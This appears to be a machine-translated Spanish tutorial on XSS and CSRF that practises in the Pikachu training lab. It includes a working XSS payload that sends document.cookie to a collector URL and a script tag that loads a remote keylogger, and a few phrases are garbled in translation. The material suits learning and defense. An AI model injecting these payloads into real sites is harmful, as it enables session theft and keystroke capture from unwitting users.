Introducción a las vulnerabilidades XSS
XSS (Cross-Site-Scripting), es decir, un ataque de secuencias de comandos entre sitios, significa que el atacante utiliza las lagunas del código en el servidor web para incrustar secuencias de comandos del lado del cliente (generalmente un código malicioso escrito en JavaScript) en la página. Cuando un usuario del servidor accede a una página que contiene un código script malicioso en un sitio web, el navegador del usuario cargará y ejecutará automáticamente el código malicioso, logrando así el objetivo del ataque.
Clasificación XSS
- XSS reflejado
- XSS almacenado
- XSS tipo DOM
Cómo utilizar la vulnerabilidad XSS para realizar el ataque
Usar XSS para robar la cookie del usuario
Puede usar la gestión de fondo XSS de pikachu, ingresar el código en el get reflexivo y puede ver la información en la gestión de fondo XSS. La ruta aquí debe basarse en su propia ruta de archivo.
<script> document.location = 'http://localhost/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie; </script>
Lógicamente, el tipo de almacenamiento XSS también es posible, pero recuerda, si usas la prueba de tipo de almacenamiento XSS, cada vez que ingreses a la interfaz de almacenamiento XSS, saltarás a index.php, si quieres resolverlo, debes vaya a la base de datos y elimine el script insertado. Los datos están en pikachu.message.
Phishing con XSS
El mecanismo de autenticación HTTP de PHP solo funciona cuando PHP se ejecuta como un módulo de Apache, por lo que esta función no está disponible para la versión CGI. Dado que estoy usando el panel de cuero pequeño, el valor predeterminado es usar CGI/FastCGI, y la pesca con el campo de tiro de pikachu no ha tenido éxito.
Supervisión del teclado mediante XSS
<script src=" http://localhost/pikachu-master/pkxss/rkeypress/rk.js"></script>
Introducción a las vulnerabilidades CSRF
CSRF (Cross-Site Request Forgery), es decir, ataque de falsificación de solicitud entre sitios. El atacante puede robar su información de inicio de sesión y simular el envío de varias solicitudes en su identidad. Esta solicitud es completamente legal para el servidor, pero completa una operación esperada por el atacante, como enviar correos electrónicos en su nombre, enviar mensajes, robar su cuenta, agregue administradores del sistema, incluso compre bienes, transfiera moneda virtual, etc.
Condiciones de ataque de vulnerabilidad CSRF
- Inicie sesión en el sitio web de confianza A y genere una cookie localmente
- Visite el sitio web peligroso B sin cerrar sesión en el sitio web A
Defensa CSRF
- Valide el campo de referencia HTTP
- Agregar token y verificar
- Atributos personalizados en encabezados HTTP y validación